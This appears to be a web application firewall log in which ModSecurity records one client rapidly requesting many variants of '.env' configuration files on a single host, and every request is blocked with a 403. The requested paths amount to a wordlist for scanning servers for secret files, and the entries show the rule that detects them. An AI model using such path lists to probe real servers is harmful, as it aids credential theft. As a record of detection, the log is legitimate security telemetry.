[Mon May 11 16:41:26.402202 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHqlkWKUxpmnkK7zHyCAAAAAQo"]
[Mon May 11 16:41:26.402689 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHqlkWKUxpmnkK7zHyCAAAAAQo"]
[Mon May 11 16:41:26.402912 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHqlkWKUxpmnkK7zHyCAAAAAQo"]
[Mon May 11 16:41:26.571254 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.staging"] [unique_id "agHqlkWKUxpmnkK7zHyCAQAAAQo"]
[Mon May 11 16:41:26.571765 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.staging"] [unique_id "agHqlkWKUxpmnkK7zHyCAQAAAQo"]
[Mon May 11 16:41:26.572000 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.staging"] [unique_id "agHqlkWKUxpmnkK7zHyCAQAAAQo"]
[Mon May 11 16:41:26.759846 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHqlkWKUxpmnkK7zHyCAgAAAQo"]
[Mon May 11 16:41:26.760383 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHqlkWKUxpmnkK7zHyCAgAAAQo"]
[Mon May 11 16:41:26.760634 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agHqlkWKUxpmnkK7zHyCAgAAAQo"]
[Mon May 11 16:41:26.924050 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agHqlkWKUxpmnkK7zHyCAwAAAQo"]
[Mon May 11 16:41:26.924551 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agHqlkWKUxpmnkK7zHyCAwAAAQo"]
[Mon May 11 16:41:26.924819 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agHqlkWKUxpmnkK7zHyCAwAAAQo"]
[Mon May 11 16:41:27.246710 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.remote"] [unique_id "agHql0WKUxpmnkK7zHyCBAAAAQo"]
[Mon May 11 16:41:27.247213 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.remote"] [unique_id "agHql0WKUxpmnkK7zHyCBAAAAQo"]
[Mon May 11 16:41:27.247458 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.remote"] [unique_id "agHql0WKUxpmnkK7zHyCBAAAAQo"]
[Mon May 11 16:41:27.412852 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHql0WKUxpmnkK7zHyCBgAAAQo"]
[Mon May 11 16:41:27.413355 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHql0WKUxpmnkK7zHyCBgAAAQo"]
[Mon May 11 16:41:27.413597 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHql0WKUxpmnkK7zHyCBgAAAQo"]
[Mon May 11 16:41:27.787062 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agHql0WKUxpmnkK7zHyCBwAAAQo"]
[Mon May 11 16:41:27.787670 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agHql0WKUxpmnkK7zHyCBwAAAQo"]
[Mon May 11 16:41:27.787961 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agHql0WKUxpmnkK7zHyCBwAAAQo"]
[Mon May 11 16:41:27.960323 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHql0WKUxpmnkK7zHyCCAAAAQo"]
[Mon May 11 16:41:27.960819 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHql0WKUxpmnkK7zHyCCAAAAQo"]
[Mon May 11 16:41:27.961045 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHql0WKUxpmnkK7zHyCCAAAAQo"]
[Mon May 11 16:41:28.129124 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHqmEWKUxpmnkK7zHyCCQAAAQo"]
[Mon May 11 16:41:28.129636 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHqmEWKUxpmnkK7zHyCCQAAAQo"]
[Mon May 11 16:41:28.129889 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHqmEWKUxpmnkK7zHyCCQAAAQo"]
[Mon May 11 16:41:28.307232 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.sample"] [unique_id "agHqmEWKUxpmnkK7zHyCCgAAAQo"]
[Mon May 11 16:41:28.307723 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.sample"] [unique_id "agHqmEWKUxpmnkK7zHyCCgAAAQo"]
[Mon May 11 16:41:28.307971 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.sample"] [unique_id "agHqmEWKUxpmnkK7zHyCCgAAAQo"]
[Mon May 11 16:41:28.484290 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agHqmEWKUxpmnkK7zHyCDAAAAQo"]
[Mon May 11 16:41:28.484814 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agHqmEWKUxpmnkK7zHyCDAAAAQo"]
[Mon May 11 16:41:28.485055 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agHqmEWKUxpmnkK7zHyCDAAAAQo"]
[Mon May 11 16:41:28.706731 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agHqmEWKUxpmnkK7zHyCDQAAAQo"]
[Mon May 11 16:41:28.707141 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agHqmEWKUxpmnkK7zHyCDQAAAQo"]
[Mon May 11 16:41:28.707370 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agHqmEWKUxpmnkK7zHyCDQAAAQo"]
[Mon May 11 16:41:28.873513 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.prod"] [unique_id "agHqmEWKUxpmnkK7zHyCDgAAAQo"]
[Mon May 11 16:41:28.873995 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.prod"] [unique_id "agHqmEWKUxpmnkK7zHyCDgAAAQo"]
[Mon May 11 16:41:28.874288 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.prod"] [unique_id "agHqmEWKUxpmnkK7zHyCDgAAAQo"]
